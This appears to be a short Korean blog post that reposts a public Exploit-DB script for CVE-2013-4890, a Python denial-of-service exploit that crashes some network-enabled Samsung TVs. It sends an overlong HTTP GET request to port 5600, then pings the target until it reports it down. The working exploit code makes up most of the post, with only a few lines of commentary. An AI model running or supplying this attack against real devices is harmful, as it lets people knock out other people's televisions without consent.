뉴스 글 업로드
http://thehackernews.com/2013/07/network-enabled-samsung-tvs-vulnerable.html
http://www.exploit-db.com 에 올라온 DoS 공격코드
코드 공개 URL
http://www.exploit-db.com/exploits/27043/
#!/usr/bin/python# Exploit Title: Samsung TV Denial of Service (DoS) Attack# Date: 07/21/2013# Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com# CVE Number: CVE-2013-4890# Vendor Homepage: http://www.samsung.com# Description: Resets some Samsung TVs# The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request# Tested successfully on my Samsung PS50C7700 plasma TV :) import httplibimport sysimport osprint " ***************************************************************************************"print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n"print " Exploit: Denial of Service (DoS) attack\n"print " Description: Resets some Samsung TVs\n"print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n"print " ***************************************************************************************\n"# Sends the payloadprint " Sending the malicious payload...\n"conn = httplib.HTTPConnection(sys.argv[1],5600)conn.request("GET", "A"*300)conn.close()# Checks the responseprint " Checking the status... (CTRL+Z to stop)\n"response = 0while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!\n"다음은 시연 동영상
python 코드로 간결하게 작성되었으며
vulnerability 취약점에 대한 공격이기 때문에
앞으로 더 발전된 코드가 나올 것 같다
댓글 없음:
댓글 쓰기